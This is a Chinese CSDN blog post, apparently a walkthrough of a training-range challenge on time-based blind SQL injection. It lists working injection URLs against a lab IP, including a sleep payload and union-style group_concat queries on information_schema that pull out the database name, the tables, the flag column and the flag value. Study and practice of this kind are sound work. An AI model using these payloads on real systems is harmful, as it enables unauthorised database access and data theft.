360众测靶场题库之56-SQL注入漏洞测试(时间盲注)

最新推荐文章于 2024-09-28 20:38:32 发布
最新推荐文章于 2024-09-28 20:38:32 发布
阅读量209 收藏
点赞数 3
分类专栏: 360众测靶场题库 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zjl12344/article/details/136606216
版权
文章描述了一个关于SQL注入的问题,通过观察回显信息,作者发现了一个可能的注入点。随后通过一系列SQL查询,成功获取了数据库名、表名、flag列名以及特定flag值,展示了逐步破解的过程。
摘要由CSDN通过智能技术生成

图上已经有提示使用?type=进行验证,不能像之前一样进行?id=1,正常是先构造闭合,最后发现竟然不需要……

http://219.153.49.228:41617/flag.php?type=1 and sleep(100) %23

1.根据回显信息进行注入

判断数据库的库名长度,但是在操作时,发现有回显,感觉这道题应该不止时间盲注一种方法,寻找注入点

http://219.153.49.228:41617/flag.php?type=1 %23

通过修改1发现下面的名称也随之改变,说明1是注入点,通过该注入点获取数据库各类信息

获取数据库名为 pentesterlab

http://219.153.49.228:41617/flag.php?type=database() %23

获取数据库表名为  comment,flag,goods,user

http://219.153.49.228:41617/flag.php?type=group_concat(table_name) from information_schema.tables where table_schema=database() %23

获取flag

http://219.153.49.228:41617/flag.php?type=group_concat(column_name) from information_schema.columns where table_name='flag' %23

获取flag为 mozhe1

http://219.153.49.228:41617/flag.php?type=group_concat(flag) from pentesterlab.flag %23

拿到key

BugBounty
关注
专栏目录
《网络安全自学教程》- SQL注入时间盲注原理+步骤+实战操作
wangyuxiang946的博客
05-21 9318
这篇文章为大家解析时间盲注的实现原理,结合实战案例讲解时间盲注的操作步骤以及时间误差的判断
360众测靶场题库之16- X-Forwarded-For注入漏洞
zjl12344的博客
03-07 291
360众测靶场题库
360众测考核简单记录
qq_43622442的博客
04-14 4463
360众测考核简单记录 一开始提前配好了代理,一下就好了。 理论题,很简单,也记不住有啥题了= = 业务题: 真的…怎么我的题目好多都是墨者上面的题。而且很多都是web的,只有一个流量分析。 第一题:       墨者的sql注入题,知道注入点在哪儿就很简单。 第二题:      &nbs...
记21年某次360众测考核试题记录
Love&Share
09-23 3392
题目分为两部分: 选择:单选,多选,判断 实操题:10个 时间:三个小时 可能会有的题目 登录框sql盲注,直接登录 PHPMailer远程命令执行漏洞 实操题是墨者学院的题,而且拿到的key也有mozhe字样,可以提前去玩玩 key一般在根目录下的key.txt或者key***.php 全程必须挂着VPN 选择 这是我当时做的,不一定正确 实操1 svn泄露 实操2 抓包改referer 实操3 前端弱口令,源码审计 $username=“admin”; $password
360众测靶场题库之64- SQL过滤字符后手工注入漏洞测试(第1题)
zjl12344的博客
03-11 256
360众测靶场题库
360众测仿真实战靶场考核技巧分享
siu~
09-23 2470
360众测仿真实战靶场考核技巧分享
360众测靶场题库之68-SVN信息泄露漏洞分析(第1题)
zjl12344的博客
03-11 279
360众测靶场题库
墨者学院-SQL注入漏洞测试(报错盲注
weixin_42939822的博客
03-30 5185
墨者学院-SQL注入漏洞测试(报错盲注
墨者学院-SQL注入漏洞测试(布尔盲注
weixin_42939822的博客
03-20 4355
决心按部就班、由浅入深地去剖析下sql注入题目提供的靶场环境,完善自身解题思路。本题靶场环境比较简单、也比较常见,没有设置严格的过滤规则,仅仅是限制了页面的回显功能,属于比较初级的sql注入题目。废话不多说啦,先附上题目链接:https://www.mozhe.cn/bug/detail/UDNpU0gwcUhXTUFvQm9HRVdOTmNTdz09bW96aGUmozhe*
墨者-SQL注入漏洞测试(报错盲注)
wh1sper、的博客
07-04 805
墨者-SQL注入漏洞测试前言一、sqlmap二、手注1.报错注入2.时间注入3.联合查询union被过滤总结 前言 本题为墨者学院在线靶场 进入题目发现是个登录界面,找了好久,最后在关于平台停机维护的通知的页面找到了注入点 判断注入类型,当输入?id=1’ and 1=1 %23时,页面显示正常。 ?id=1' and 1=1 %23 当输入?id=1’ and 1=2 %23时,页面显示不正常。 由此判断注入类型为单字符注入。 一、sqlmap 首先先清理sqlmap的缓存。 python sq
360众测靶场题库之83- 身份认证失效漏洞实战
zjl12344的博客
03-12 427
360众测靶场题库
360众测靶场题库之85- WordPress插件漏洞分析溯源,2024年最新5分钟搞定
2401_83974087的博客
04-13 384
字段爆出来之后,便可以利用用户名和密码登录WordPress后台。看到插件一栏,点击修改comment-rating插件的PHP源文件,需要注意,修改的源文件最好是已启用的,添加一句话木马:,下一步就是菜刀连了。
360众测靶场题库之55-SQL注入漏洞测试(HTTP头注入)
zjl12344的博客
03-10 328
360众测靶场题库
360众测靶场题库之6-Just CMS系统漏洞
zjl12344的博客
03-06 198
360众测靶场题库
用例设计基础知识考试
12-19 4538
用例设计基础知识考试 1.以下哪一个不是用例执行结果?(单选) A. Pass B. BlockC. No NeedD. N/A 2.执行用例时发现bug,在报bug的过程中以下说法错误的是:(单选) A.如果是APP崩溃的bug需要提供log文件 B. UI的bug需要截图,并粘贴在bug的附件里 C.一个bug,反复验证了5次,只有3次能复现,但考虑到增大bug被处...
记一次360众测仿真实战靶场考核WP
god_Zeo的安全博客
04-06 8552
0x00 考核主要分为两部分 第一部分为客观题:分为单选题,多选题,和判断题。 我记录了一道有趣的题,也是不清楚正确答案的群 第二部分为操作题: 0x01客观题 我记录了一道有趣的题,也是不清楚正确答案,有大佬知道吗 0x02:操作题 源码分析题,给你源码提及一个数据 PHP == 弱语言绕过 ,因为没弄过CTF也是印象比较深刻 网站被黑,可以下载整站,找后门 下载源码,找...
记一次某众测靶场考核
蚁景网安学院
11-18 2750
最近没什么事,于是报名了某众测,填了资料主办方给了个靶场要考核,这里分享一下靶场考核中的解题过程,一共十道题目,难度也不算太难,但也有一些题没做出来,最后也是顺利的通过了考核。
从密码学看盲拍合约:智能合约的隐私与安全新革命!
最新发布
Huahua_1223的博客
09-28 1234
随着区块链技术的发展,智能合约在各种场景中的应用越来越广泛。盲拍合约作为一种新兴的智能合约形式,利用密码学原理为参与者提供了隐私保护和安全保障。这种合约不仅增强了竞拍的公平性,还消除了时间压力,让参与者能够在更为放松的环境中进行投标。本文将深入探讨盲拍合约的定义、优势、工作原理以及代码实现,旨在为读者提供一个全面的理解。盲拍合约是一种智能合约,允许参与者在不公开其出价的情况下进行竞拍。参与者提交一个“盲出价”,其中包含出价金额、一个虚假的标记以及一个秘密值。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值